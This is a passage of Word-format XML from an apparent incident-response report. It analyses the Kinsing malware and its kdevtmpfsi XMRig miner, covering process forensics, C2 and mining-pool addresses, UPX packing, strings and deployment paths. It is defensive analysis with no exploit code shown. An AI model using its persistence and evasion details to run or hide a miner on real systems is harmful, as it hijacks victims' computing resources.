        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">interactive terminal sessions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than programmatic invocations, suggesting Kinsing monitors /proc/[pid]/fd/0 for TTY associations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.8 Live Process Forensics (PID 48227)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deep /proc examination of the running Kinsing process revealed critical operational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PID / PPid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48227 / 1 (adopted by init — parent exited)</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Threads</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15 active threads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State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Sleeping (futex wait)</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UID/GID</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0/0 (running as root)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CWD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/opt</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FD 0/1/2</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/dev/null (stdin/stdout/stderr redirected)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FD 3</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/run/lock/linux.lock (single-instance lock)</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FD 7</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socket (C2 communication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The process environment exposes the full exploitation context:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SKL=mt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Internal Kinsing configuration flag (multi-threaded mode)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">D=FALSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Debug mode disabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">MB_SITE_URL=https://agricultureintech[.]net/analytics/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — The compromised web application URL that served as the initial exploitation surface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SUDO_COMMAND=/usr/bin/bash -c ... nohup java -jar metabase.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Confirms Kinsing spawned through the Metabase/Java stack via sudo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Connections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple active connections observed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple connections to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">80.64.16[.]241</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (hex: F1104050) on port 80 — the cron C2 server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Socket file descriptor maintained for persistent C2 channel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Tooling Present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The system had </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh/OSSEC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> security monitoring installed (identified via dpkg verify in binary_integrity.txt). Only expected configuration files were modified — no binary tampering detected outside of the malware itself. This indicates the attacker achieved persistence despite active security monitoring, likely through the fileless execution technique and rootkit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">5. kdevtmpfsi (XMRig Miner) — Deep Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Binary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Architecture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x86-64 (LE)</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Compiler</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GCC</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Packing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UPX (Ultimate Packer for eXecutables)</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Packed Size</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2,084,964 bytes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Memory Layout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Single segment: 0x00400000 – 0x005FCD5B (R-X)</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Functions (packed)</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6 (only UPX stub + entry visible to Ghidra)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Defined Strings (packed)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12</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Imports</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0 (statically linked or resolved at runtime)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Runtime CPU Usage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401% (4 threads)</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Mining Pool</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185.221.152[.]130:443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 UPX Packing Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ghidra analysis of the packed binary reveals the UPX decompression stub:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Entry Point (0x005FC548)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The entry function calls FUN_005FC7C8 (memory setup) followed by FUN_005FC5B8 (the UPX decompression engine):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_005FC5B8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — The main UPX decompression loop (167 lines of decompiled code). Uses bit-level operations to decompress LZ77-compressed data:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads compressed data byte-by-byte from packed section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses carry flag tracking for Lempel-Ziv back-reference decoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Copies decompressed bytes to output buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminates when XOR with 0xFFFFFFFF produces zero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FUN_005FC74C — Memory Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Makes three syscall() invocations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mmap (syscall) to allocate 0xC00000 (12 MB) at 0x712453 with 0x1E flags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This maps the decompressed binary into executable memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Control then transfers to the decompressed XMRig code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decompiled Strings (Packed Binary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Even in the packed state, fragment strings reveal the miner identity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">lXMR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Monero cryptocurrency identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — TLS/SSL mining pool connection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CPU mining mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ALGO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Mining algorithm selection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Pool URL configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">GHASH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Hash function reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">appro@openssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — OpenSSL attribution string (statically linked)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Mining Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Runtime analysis and process data from the live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Mining Algorithm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RandomX (Monero/XMR) — inferred from CPU-intensive behavior</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Pool Connection</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185.221.152[.]130:443 (TLS encrypted)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CPU Threads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4 (401% CPU utilization)</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Process Name</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kdevtmpfsi (mimics kernel device tmp filesystem)</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Process PID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960488 (at time of capture)</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Parent Process</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Kinsing (PID 48227)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Deployment Path</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/tmp/kdevtmpfsi</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Backup Copy</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/tmp/kdevtmpfsi.bak</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Alternative Path</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/dev/shm/kdevtmpfsi (shared memory, for tmpfs restrictions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note on Unpacking: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
